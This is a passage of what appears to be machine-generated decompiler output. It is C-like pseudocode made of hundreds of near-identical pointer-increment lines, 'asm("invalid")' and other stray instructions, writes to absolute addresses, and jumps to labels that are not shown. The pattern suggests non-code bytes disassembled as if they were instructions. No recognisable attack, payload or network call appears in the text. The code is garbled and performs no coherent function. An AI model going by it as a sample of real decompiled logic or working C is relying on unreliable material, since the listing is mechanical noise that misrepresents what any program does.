                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *_t1221 =  *_t1221 + 0x24000003;
                                                                        				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t1221;
                                                                        				 *0x24000038 =  *((intOrPtr*)(0x24000038)) + 0x24;
                                                                        				 *0x24000004 =  *((intOrPtr*)(0x24000004)) + 0x24000004;
                                                                        				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 0x24000004;
                                                                        				 *0x23004218 =  *((intOrPtr*)(0x23004218)) + 1;
                                                                        				asm("invalid");
                                                                        				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 1;
                                                                        				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 0x24000004;
                                                                        				asm("aaa");
                                                                        				 *_t1258 =  *_t1258 & 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				asm("enter 0x76bf, 0x0");
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
                                                                        				 *_t1221 =  *_t1221 + 0x8fffffec;
                                                                        				 *((intOrPtr*)(0x8fffffec)) =  *((intOrPtr*)(0x8fffffec)) + 0x8fffffec;
                                                                        				asm("aas");
                                                                        				_t1059 = 0x8fffffec + _t1258 + 1;
                                                                        				 *_t1059 =  *_t1059 + _t1059;
                                                                        				 *_t1059 =  *_t1059 + _t1059;
                                                                        				 *0x76 =  *0x76 + _t1221;
                                                                        				_t1060 = _t1059 + 1;
                                                                        				 *_t1221 =  *_t1221 + _t1060;
                                                                        				 *_t1060 =  *_t1060 + _t1060;
                                                                        				 *0x76 =  *0x76 + _t1258;
                                                                        				_t1061 = _t1060 + 1;
                                                                        				 *_t1061 =  *_t1061 + _t1061;
                                                                        				 *_t1061 =  *_t1061 + _t1061;
                                                                        				 *_t1061 =  *_t1061 + _t1258;
                                                                        				asm("daa");
                                                                        				_t1062 = _t1061 + 1;
                                                                        				 *_t1221 =  *_t1221 + _t1062;
                                                                        				 *_t1062 =  *_t1062 + _t1062;
                                                                        				 *0x76 =  *0x76 + _t1258;
                                                                        				_t1063 = _t1062 + 1;
                                                                        				 *_t1063 =  *_t1063 + _t1063;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1258;
                                                                        				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 2;
                                                                        				 *((intOrPtr*)(_t1305 + _t1258 * 2)) =  *((intOrPtr*)(_t1305 + _t1258 * 2)) + _t1221;
                                                                        				_t1259 = _t1258 + 1;
                                                                        				 *_t1063 =  *_t1063 + _t1063;
                                                                        				 *_t1063 =  *_t1063 + _t1063;
                                                                        				_t1278 =  *_t1277;
                                                                        				asm("in al, 0x3f");
                                                                        				asm("aas");
                                                                        				_t1067 = _t1063 + 2 + _t1259 + 1;
                                                                        				 *_t1067 =  *_t1067 + _t1067;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t1067 + _t1067)) =  *((intOrPtr*)(_t1067 + _t1067)) + _t1259;
                                                                        				 *_t1067 =  *_t1067 + _t1067;
                                                                        				_t1068 = _t1067 + 1;
                                                                        				asm("invalid");
                                                                        				 *_t1068 =  *_t1068 + 1;
                                                                        				 *_t1068 =  *_t1068 + _t1068;
                                                                        				 *_t1068 =  *_t1068 + _t1068;
                                                                        				 *_t1068 =  *_t1068 + _t1068;
                                                                        				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 4;
                                                                        				 *_t1068 =  *_t1068 + _t1259;
                                                                        				_pop(_t1260);
                                                                        				if ( *_t1068 >= 0) goto L84;
                                                                        				_t1069 = _t1305;
                                                                        				_t1306 = _t1068;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t1069 =  *_t1069 + _t1069;
                                                                        				 *_t1069 =  *_t1069 + _t1069;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11700040)) =  *((intOrPtr*)(_t1278 + 0x11700040)) + _t1260;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1260;
                                                                        				_t1073 = (_t1069 ^ 0x00000027) + 3;
                                                                        				 *((intOrPtr*)(_t1221 + _t1260 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1260 + 0x40)) + 1;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1073 =  *_t1073 + _t1073;
                                                                        				 *_t1221 =  *_t1221 + _t1073;
                                                                        				 *_t1221 =  *_t1221 + _t1073;
                                                                        				 *((intOrPtr*)(_t1073 + 0x35)) =  *((intOrPtr*)(_t1073 + 0x35)) + 0x24;
                                                                        				_t1074 = _t1073 + 1;
                                                                        				 *_t1074 =  *_t1074 + _t1074;
                                                                        				 *_t1074 =  *_t1074 + _t1074;
                                                                        				_t1075 = _t1074 + 1;
                                                                        				_push(ss);
                                                                        				_t1213 = 8;
                                                                        				asm("invalid");
                                                                        				 *_t1075 =  *_t1075 + 1;
                                                                        				 *_t1075 =  *_t1075 + _t1075;
                                                                        				_t1077 = _t1075 + _t1075 ^ 0x201c0040;
                                                                        				_t1262 = _t1260 + 2;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				_t651 = _t1077 + 0x49;
                                                                        				 *_t651 =  *((intOrPtr*)(_t1077 + 0x49)) + _t1221;
                                                                        				if ( *_t651 >= 0) goto L85;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				_push(0x1004028);
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 0x24;
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				_push(0x1004028);
                                                                        				 *_t1077 =  *_t1077 + _t1077;
                                                                        				 *((intOrPtr*)(_t1077 + 0x28)) =  *((intOrPtr*)(_t1077 + 0x28)) + _t1262;
                                                                        				_t1078 = _t1077 + 1;
                                                                        				 *_t1078 =  *_t1078 + _t1078;
                                                                        				 *_t1078 =  *_t1078 + _t1078;
                                                                        				 *((intOrPtr*)(_t1078 +  &_a64)) =  *((intOrPtr*)(_t1078 +  &_a64)) + _t1221;
                                                                        				 *_t1262 =  *_t1262 + _t1078;
                                                                        				 *_t1078 =  *_t1078 + _t1078;
                                                                        				 *((intOrPtr*)(_t1078 + 0x28)) =  *((intOrPtr*)(_t1078 + 0x28)) + _t1262;
                                                                        				_t1079 = _t1078 + 1;
                                                                        				 *_t1079 =  *_t1079 + _t1079;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1262;
                                                                        				_t1080 = _t1079 + _t1079;
                                                                        				 *_t1080 =  *_t1080 - _t1080;
                                                                        				_t1081 = _t1080 ^ 0x0000009a;
                                                                        				_t1263 = _t1262 + 1;
                                                                        				 *_t1081 =  *_t1081 + _t1081;
                                                                        				 *_t1081 =  *_t1081 + _t1081;
                                                                        				asm("out 0x75, al");
                                                                        				 *0x3D4400B6 =  *((intOrPtr*)(0x3d4400b6)) + _t1263;
                                                                        				_t1083 = _t1081 + _t1221 + 1;
                                                                        				 *_t1083 =  *_t1083 + _t1083;
                                                                        				_t1084 = _t1083 | 0x00003400;
                                                                        				 *((intOrPtr*)(_t1281 + 0xb6)) =  *((intOrPtr*)(_t1281 + 0xb6)) + _t1263;
                                                                        				 *_t1221 =  *_t1221 + _t1084;
                                                                        				 *((intOrPtr*)(8)) =  *((intOrPtr*)(8)) + _t1084;
                                                                        				 *_t1084 =  *_t1084 + _t1084;
                                                                        				 *_t1084 =  *_t1084 + _t1084;
                                                                        				 *_t1084 =  *_t1084 + _t1084;
                                                                        				 *_t1084 =  *_t1084 + _t1084;
                                                                        				_t1085 = _t1084 + _t1084;
                                                                        				 *_t1085 =  *_t1085 - _t1085;
                                                                        				_t1429 =  *_t1085;
                                                                        				if(_t1429 < 0) {
                                                                        					L90:
                                                                        					 *_t1085 =  *_t1085 + _t1085;
                                                                        					 *_t1085 =  *_t1085 + _t1085;
                                                                        					 *_t1085 =  *_t1085 + _t1085;
                                                                        				} else {
                                                                        					if (_t1429 >= 0) goto L87;
                                                                        					_t1155 = _t1085 +  *_t1085 + 1;
                                                                        					 *0x76 =  *0x76 + 8;
                                                                        					 *_t1155 =  *_t1155 + 1;
                                                                        					 *_t1155 =  *_t1155 + _t1155;
                                                                        					 *((intOrPtr*)(_t1263 + 0xffffffffffff00b6)) =  *((intOrPtr*)(_t1263 + 0xffffffffffff00b6)) + _t1155;
                                                                        					asm("invalid");
                                                                        					 *_t1155 =  *_t1155 + _t1155;
                                                                        					 *_t1155 =  *_t1155 + _t1155;
                                                                        					 *_t1155 =  *_t1155 + _t1155;
                                                                        					 *_t1155 =  *_t1155 + _t1155;
                                                                        					_t1157 = (_t1155 | 0x00000029) + 1;
                                                                        					 *_t1157 =  *_t1157 + _t1263;
                                                                        					_pop(_t1263);
                                                                        					if ( *_t1157 >= 0) goto L88;
                                                                        					_t1085 = _t1306;
                                                                        					_t1306 = _t1157;
                                                                        					asm("invalid");
                                                                        					asm("invalid");
                                                                        					 *_t1085 =  *_t1085 + _t1085;
                                                                        					 *_t1085 =  *_t1085 + _t1085;
                                                                        					if( *_t1085 >= 0) {
                                                                        						asm("daa");
                                                                        						_t1160 = _t1085 + 1 + _t1263 + 1;
                                                                        						 *((intOrPtr*)(_t1160 + 0x11)) =  *((intOrPtr*)(_t1160 + 0x11)) + _t1263;
                                                                        						 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1263;
                                                                        						_t1085 = _t1160 + 2;
                                                                        						 *((intOrPtr*)(_t1221 + _t1263 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1263 + 0x40)) + 1;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						 *_t1085 =  *_t1085 + _t1085;
                                                                        						goto L90;
                                                                        					}
                                                                        				}
                                                                        				 *_t1085 =  *_t1085 + _t1085;
                                                                        				_t1086 = _t1085;
                                                                        				 *_t1086 =  *_t1086 - _t1086;
                                                                        				asm("lock daa");
                                                                        				_t1087 = _t1086 + 1;
                                                                        				 *((intOrPtr*)(_t1087 + 0x11)) =  *((intOrPtr*)(_t1087 + 0x11)) + _t1263;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1263;
                                                                        				_t1089 = _t1087 + 2;
                                                                        				 *((intOrPtr*)(_t1221 + _t1263 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1263 + 0x40)) + _t1213;
                                                                        				 *_t1089 =  *_t1089 + _t1089;
                                                                        				_t1090 = _t1089 + _t1263;
                                                                        				 *_t1090 =  *_t1090 + _t1090;
                                                                        				 *((intOrPtr*)(_t1090 + 0x35)) =  *((intOrPtr*)(_t1090 + 0x35)) + _t1090;
                                                                        				_t1091 = _t1090 + 1;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *((intOrPtr*)(_t1091 + 0x18)) =  *((intOrPtr*)(_t1091 + 0x18)) + _t1091;
                                                                        				_t1264 = _t1263 + 1;
                                                                        				 *((intOrPtr*)(_t1091 + 0x1a)) =  *((intOrPtr*)(_t1091 + 0x1a)) + _t1264;
                                                                        				 *((intOrPtr*)(_t1091 - 0x78)) =  *((intOrPtr*)(_t1091 - 0x78)) + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 | _t1091;
                                                                        				_t1266 = _t1264 + 2;
                                                                        				 *((intOrPtr*)(_t1278 + 0x4010)) =  *((intOrPtr*)(_t1278 + 0x4010)) + _t1266;
                                                                        				 *_t1266 =  *_t1266 & _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				asm("adc byte [ebx], 0x40");
                                                                        				 *_t1213 =  *_t1213 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *_t1221 =  *_t1221 + _t1091;
                                                                        				 *_t1091 =  *_t1091 + _t1091;
                                                                        				 *((intOrPtr*)(_t1091 + 0x35)) =  *((intOrPtr*)(_t1091 + 0x35)) + _t1091;
                                                                        				_t1092 = _t1091 + 1;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1213;
                                                                        				_pop(ss);
                                                                        				_t1267 =  &(_t1266[0]);
                                                                        				_t1214 = _t1213 + _t1213;
                                                                        				asm("invalid");
                                                                        				 *_t1092 =  *_t1092 + 1;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *((intOrPtr*)(_t1281 + _t1278 + 0x20080040)) =  *((intOrPtr*)(_t1281 + _t1278 + 0x20080040)) + _t1267;
                                                                        				_t1268 =  &(_t1267[0]);
                                                                        				 *_t1268 =  *_t1268 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1268;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1268;
                                                                        				 *_t1221 =  *_t1221 + _t1092;
                                                                        				 *_t1092 =  *_t1092 + _t1092;
                                                                        				 *((intOrPtr*)(_t1092 + 0x3a)) =  *((intOrPtr*)(_t1092 + 0x3a)) + _t1268;
                                                                        				_t1093 = _t1092 + 1;
                                                                        				 *_t1093 =  *_t1093 + _t1093;
                                                                        				 *_t1093 =  *_t1093 + _t1093;
                                                                        				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1214;
                                                                        				 *_t1221 =  *_t1221 + _t1093;
                                                                        				 *_t1093 =  *_t1093 + _t1093;
                                                                        				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1093;
                                                                        				 *_t1093 =  *_t1093 + _t1093;
                                                                        				 *_t1093 =  *_t1093 + _t1093;
                                                                        				 *((intOrPtr*)(_t1093 + 0x2c)) =  *((intOrPtr*)(_t1093 + 0x2c)) + _t1093;
                                                                        				_t1094 = _t1093 + 1;
                                                                        				 *_t1278 =  *_t1278 + _t1094;
                                                                        				 *_t1094 =  *_t1094 + _t1094;
                                                                        				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1094;
                                                                        				 *_t1214 =  *_t1214 + _t1094;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1268;
                                                                        				 *((intOrPtr*)(_t1281 +  &_a64)) =  *((intOrPtr*)(_t1281 +  &_a64)) + _t1268;
                                                                        				 *_t1094 =  *_t1094 + _t1214;
                                                                        				_t1095 =  *0x42;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				_push(0x76);
                                                                        				if ( *_t1095 >= 0) goto L92;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				asm("pushad");
                                                                        				if(_t1095 !=  *_t1095) {
                                                                        					_t1149 = _t1095 + 1;
                                                                        					 *_t1149 =  *_t1149 + _t1149;
                                                                        					_pop(ds);
                                                                        					 *((intOrPtr*)(_t1149 + _t1149)) =  *((intOrPtr*)(_t1149 + _t1149)) + _t1214;
                                                                        					 *_t1149 =  *_t1149 + _t1149;
                                                                        					_t1150 = _t1149 + 1;
                                                                        					_t1214 = _t1214 + _t1214;
                                                                        					asm("invalid");
                                                                        					 *_t1150 =  *_t1150 + 1;
                                                                        					 *_t1150 =  *_t1150 + _t1150;
                                                                        					 *_t1150 =  *_t1150 + _t1150;
                                                                        					 *_t1150 =  *_t1150 + _t1150;
                                                                        					 *((intOrPtr*)(_t1150 + 0x2d)) =  *((intOrPtr*)(_t1150 + 0x2d)) + _t1150;
                                                                        					_t1151 = _t1150 + 1;
                                                                        					 *_t1151 =  *_t1151 + _t1268;
                                                                        					_pop(_t1268);
                                                                        					if ( *_t1151 >= 0) goto L94;
                                                                        					_t1152 = _t1306;
                                                                        					_t1306 = _t1151;
                                                                        					asm("invalid");
                                                                        					asm("invalid");
                                                                        					_t1153 = _t1152 + 1;
                                                                        					 *0x76 =  *0x76 + _t1221;
                                                                        					 *_t1153 =  *_t1153 + _t1153;
                                                                        					 *_t1153 =  *_t1153 + _t1153;
                                                                        					asm("adc al, 0x3b");
                                                                        					_t1095 = _t1153 + 1;
                                                                        					 *_t1221 =  *_t1221 + _t1095;
                                                                        					 *_t1214 =  *_t1214 + _t1095;
                                                                        					 *_t1095 =  *_t1095 + _t1095;
                                                                        				}
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				 *_t1095 =  *_t1095 + _t1095;
                                                                        				asm("hlt");
                                                                        				_t1096 = _t1095 - 0x5a200040;
                                                                        				if (_t1096 >= 0) goto L96;
                                                                        				_t1098 = (_t1096 & 0x0000003b) + 1;
                                                                        				 *_t1221 =  *_t1221 + _t1098;
                                                                        				 *_t1214 =  *_t1214 + _t1098;
                                                                        				 *_t1098 =  *_t1098 + _t1098;
                                                                        				asm("adc eax, [eax]");
                                                                        				 *_t1098 =  *_t1098 + _t1098;
                                                                        				 *_t1098 =  *_t1098 + _t1268;
                                                                        				_t1100 = _t1098 +  *_t1098 +  *((intOrPtr*)(_t1098 +  *_t1098));
                                                                        				 *_t1100 =  *_t1100 + _t1100;
                                                                        				 *_t1100 =  *_t1100 + _t1100;
                                                                        				 *_t1100 =  *_t1100 + _t1100;
                                                                        				 *_t1100 =  *_t1100 + _t1100;
                                                                        				_t1102 = _t1100 - 1 + 1;
                                                                        				 *_t1102 =  *_t1102 + _t1268;
                                                                        				_pop(_t1269);
                                                                        				if ( *_t1102 >= 0) goto L97;
                                                                        				_t1106 = _t1102 + 1 +  *((intOrPtr*)(_t1102 + 1)) +  *((intOrPtr*)(_t1102 + 1 +  *((intOrPtr*)(_t1102 + 1)))) + 1;
                                                                        				 *_t1106 =  *_t1106 + _t1214;
                                                                        				 *_t1106 =  *_t1106 + _t1221;
                                                                        				 *_t1106 =  *_t1106 + _t1106;
                                                                        				_t1108 = _t1106 +  *_t1106;
                                                                        				 *_t1108 =  *_t1108 + _t1108;
                                                                        				 *_t1108 =  *_t1108 + _t1108;
                                                                        				 *_t1108 =  *_t1108 + _t1108;
                                                                        				 *_t1108 =  *_t1108 + _t1108;
                                                                        				asm("lodsb");
                                                                        				_t1109 = _t1108 + 1;
                                                                        				_t745 = _t1109 + 0x5a;
                                                                        				 *_t745 =  *((intOrPtr*)(_t1109 + 0x5a)) + _t1109;
                                                                        				if ( *_t745 >= 0) goto L98;
                                                                        				_pop(_t1309);
                                                                        				_t1112 = _t1109 +  *_t1109 + 1;
                                                                        				 *_t1112 =  *_t1112 + _t1269;
                                                                        				 *((intOrPtr*)(_t1112 + _t1112)) =  *((intOrPtr*)(_t1112 + _t1112)) + _t1221;
                                                                        				 *((intOrPtr*)(_t1214 + 0xb6)) =  *((intOrPtr*)(_t1214 + 0xb6)) + _t1221;
                                                                        				 *0x300 =  *0x300 + _t1112;
                                                                        				 *_t1112 =  *_t1112 + _t1112;
                                                                        				 *_t1112 =  *_t1112 + _t1112;
                                                                        				 *_t1112 =  *_t1112 + _t1112;
                                                                        				 *((intOrPtr*)(0x76 + _t1281)) =  *((intOrPtr*)(0x76 + _t1281)) + _t1112;
                                                                        				_t1113 = _t1112 + 1;
                                                                        				_t755 = _t1113 + 0x5a;
                                                                        				 *_t755 =  *((intOrPtr*)(_t1113 + 0x5a)) + _t1269;
                                                                        				_t1449 =  *_t755;
                                                                        				if (_t1449 >= 0) goto L99;
                                                                        				if(_t1449 >= 0) {
                                                                        					_t1143 = _t1113 + 1;
                                                                        					 *0x40000300 =  *0x40000300 + _t1143;
                                                                        					 *_t1221 =  *_t1221 + _t1143;
                                                                        					 *_t1143 =  *_t1143 + _t1269;
                                                                        					 *_t1143 =  *_t1143 + _t1143;
                                                                        					 *_t1214 = _t1214;
                                                                        					_t1144 = _t1143 + 1;
                                                                        					 *_t1269 =  *_t1269 + _t1144;
                                                                        					 *_t1214 =  *_t1214 + _t1144;
                                                                        					 *_t1144 =  *_t1144 + _t1144;
                                                                        					 *_t1144 =  *_t1144 + _t1144;
                                                                        					 *_t1144 =  *_t1144 + _t1144;
                                                                        					 *_t1144 =  *_t1144 + _t1144;
                                                                        					 *((intOrPtr*)(0x76 +  &_a64)) =  *((intOrPtr*)(0x76 +  &_a64)) + _t1214;
                                                                        					_t761 = _t1144 + 0x5a;
                                                                        					 *_t761 =  *((intOrPtr*)(_t1144 + 0x5a)) + _t1144;
                                                                        					if ( *_t761 >= 0) goto L101;
                                                                        					asm("das");
                                                                        					_t1113 =  *0xad00402f + 1;
                                                                        					 *((intOrPtr*)(_t1269 + 0x402f)) =  *((intOrPtr*)(_t1269 + 0x402f)) + _t1214;
                                                                        				}
                                                                        				 *_t1113 =  *_t1113 + _t1113;
                                                                        				 *((intOrPtr*)(_t1309 +  &_a64)) =  *((intOrPtr*)(_t1309 +  &_a64)) + _t1113;
                                                                        				_t1115 = _t1113 + _t1214 -  *((intOrPtr*)(_t1113 + _t1214));
                                                                        				if(_t1115 >= 0) {
                                                                        					 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        					_t1115 = _t1115 + 2;
                                                                        					 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        					 *_t1115 =  *_t1115 + _t1115;
                                                                        					 *_t1115 =  *_t1115 + _t1115;
                                                                        					 *_t1115 =  *_t1115 + _t1115;
